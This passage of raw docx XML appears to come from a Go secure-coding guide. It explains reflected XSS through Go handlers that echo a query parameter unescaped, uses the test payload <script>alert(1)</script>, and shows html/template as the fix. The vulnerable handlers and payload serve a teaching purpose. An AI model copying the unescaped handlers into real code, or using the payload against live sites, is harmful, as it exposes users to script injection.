        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>doesn't change</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> the URL request path for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>CONNECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requests, thus possibly making an application </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>vulnerable for path traversal attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> if allowed request methods are not limited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Third-party packages:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:hyperlink r:id="rId58" w:tooltip="">
        <w:r>
          <w:t>Gorilla Toolkit - MUX</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="21" w:name="Output_Encoding"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Output Encoding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Although output encoding only has six bullets in the section on </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>OWASP SCP Quick Reference Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, undesirable practices of Output Encoding are rather prevalent in Web Application development, thus leading to the Top 1 vulnerability: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="22" w:name="XSS___Cross_Site_Scripting"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>XSS - Cross Site Scripting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Although most developers have heard about it, most have never tried to exploit a Web Application using XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross Site Scripting has been on </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>OWASP Top 10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> security risks since 2003 and it's still a common vulnerability. The </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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60" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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1" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>html/template package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Quite easily, you can find "hello world" examples using </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>net/http</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> packages. And without realizing it, you're vulnerable to XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Imagine the following code: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"io"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler (w http.ResponseWriter, r *http.Request) {
    io.WriteString(w, r.URL.Query().Get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"param1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main ()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This snippet creates and starts an HTTP Server listening on port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:t>), handling requests on server's root (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>handler()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function, which handles requests, expects a Query String parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t>, whose value is then written to the response stream (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP response header is not explicitly defined, Go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>http.DetectContentType</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> default value will be used, which follows the </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>WhatWG spec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So, making </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equal to "test", will result in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP response header to be sent as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/plain</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5303520" cy="3867912"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Content-Type: text/plain" id="1" name="text-plain.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Content-Type: text/plain" id="0" name="text-plain.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5303520" cy="3867912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> first characters are "&lt;h1&gt;", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/html</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5294376" cy="3867912"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Content-Type: text/html" id="2" name="text-html.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Content-Type: text/html" id="0" name="text-html.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5294376" cy="3867912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You may think that making </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equal to any HTML tag will lead to the same behavior, but it won't. Making </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equal to "&lt;h2&gt;", "&lt;span&gt;" or "&lt;form&gt;" will make </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be sent as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>plain/text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead of expected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/html</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now let's make </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equal to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As per the </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>WhatWG spec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP response header will be sent as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value will be rendered, and here it is, the XSS (Cross Site Scripting).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="12490704" cy="6775704"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="XSS - Cross-Site Scripting" id="3" name="xss.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="XSS - Cross-Site Scripting" id="0" name="xss.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="12490704" cy="6775704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>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2"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be set automatically besides having </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/plain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as default, is not the best way to go.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let's make it clear: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/plain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and/or the </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>text/template package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> won't keep you away from XSS, since it does not sanitize user input.</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"text/template"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler(w http.ResponseWriter, r *http.Request) {
        param1 := r.URL.Query().Get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"param1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        tmpl := template.New(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"hello"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        tmpl, _ = tmpl.Parse(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">`{{define "T"}}{{.}}{{end}}`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        tmpl.ExecuteTemplate(w, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"T"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, param1)
}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main()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Making </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equal to "&lt;h1&gt;" will lead to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> being sent as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/html</w:t>
      </w:r>
      <w:r>
        <w:t>. This is what makes you vulnerable to XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="12490704" cy="6775704"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="XSS while using text/template package" id="4" name="text-template-xss.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="XSS while using text/template package" id="0" name="text-template-xss.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="12490704" cy="6775704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By replacing the </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>text/template package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>html/template</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> one, you'll be ready to proceed... safely.</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"net/http"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"html/template"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler(w http.ResponseWriter, r *http.Request) {
        param1 := r.URL.Query().Get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"param1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        tmpl := template.New(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"hello"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        tmpl, _ = tmpl.Parse(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">`{{define "T"}}{{.}}{{end}}`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        tmpl.ExecuteTemplate(w, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"T"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, param1)
}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
        http.HandleFunc(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, handler)
        http.ListenAndServe(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":8080"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Not only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP response header will be sent as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/plain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is equal to "&lt;h1&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="12472416" cy="6766559"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Content-Type: text/plain while using html/template package" id="5" name="html-template-plain-text.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Content-Type: text/plain while using html/template package" id="0" name="html-template-plain-text.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="12472416" cy="6766559"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">but also </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is properly encoded to the output media: the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="12508992" cy="6775704"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="No XSS while using html/template package" id="6" name="html-template-text-plain-noxss.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="No XSS while using html/template package" id="0" name="html-template-text-plain-noxss.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="12508992" cy="6775704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
